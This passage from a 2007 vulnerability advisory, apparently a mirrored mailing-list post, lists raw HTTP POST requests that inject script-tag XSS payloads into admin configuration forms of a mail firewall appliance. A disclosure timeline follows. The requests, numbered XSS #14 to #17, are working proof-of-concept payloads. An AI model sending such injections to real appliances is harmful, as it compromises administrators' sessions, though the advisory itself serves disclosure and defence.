OWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:56 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

=2E: [ XSS #14 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

=2E: [ XSS #15 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

=2E: [ XSS #16 ] :.

POST
https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 100
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailFirewall_MailRoutingInternal.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
dtype=INBOUND&input1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&input2=&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

=2E: [ XSS #17 ] :.

POST https://172.0.0.2:10443/admin/mailIdsConfig.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/mailIdsConfig.do?method=init&isMenuToggled=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2237
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailIdsConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2CMailIPSMenu%2CApplicationLevelMenu%2CMailIDSMenu%2CApplicationLevelMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=10&rows%5B0%5D.attrName=pass_monitor&rows%5B0%5D.attrType=5&rows%5B0%5D.attrValidate=&rows%5B0%5D.attrValidateStr=&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=0&rows%5B0%5D.langTagId=2000006&rows%5B1%5D.attrName=enable_dos&rows%5B1%5D.attrType=5&rows%5B1%5D.attrValidate=&rows%5B1%5D.attrValidateStr=&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=0&rows%5B1%5D.langTagId=2000008&rows%5B2%5D.attrName=shm_timeout&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-65535%5D&rows%5B2%5D.attrValidateStr=%5B1-65535%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=100&rows%5B2%5D.langTagId=2001009&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=shm_spamcount&rows%5B3%5D.attrType=2&rows%5B3%5D.attrValidate=%5B1-65535%5D&rows%5B3%5D.attrValidateStr=%5B1-65535%5D&rows%5B3%5D=2EattrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=100&rows%5B3%5D.langTagId=2001010&rows%5B3%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&rows%5B4%5D.attrName=passcrackswitch&rows%5B4%5D.attrType=5&rows%5B4%5D.attrValidate=&rows%5B4%5D.attrValidateStr=&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=0&rows%5B4%5D.langTagId=2004104&rows%5B5%5D.attrName=passcrackcount&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-100%5D&rows%5B5%5D.attrValidateStr=%5B1-100%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2004105&rows%5B5%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA3%27%29%3C%2Fscript%3E&rows%5B6%5D.attrName=passtimeout&rows%5B6%5D.attrType=2&rows%5B6%5D.attrValidate=%5B1-3600%5D&rows%5B6%5D.attrValidateStr=%5B1-3600%5D&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=60&rows%5B6%5D.langTagId=2004106&rows%5B6%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA4%27%29%3C%2Fscript%3E&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:24:22 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

=2E: [ TIMELINE ] :.

22/Mar/2007	- We publish the advisory.
07/Mar/2007	- Second contact. Provider doesn't answered.
27/Feb/2007	- First contact with provider.
19/Feb/2007	- Vulnerabilities founded.

--=_gantz-15840-1174901611-0001-2--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.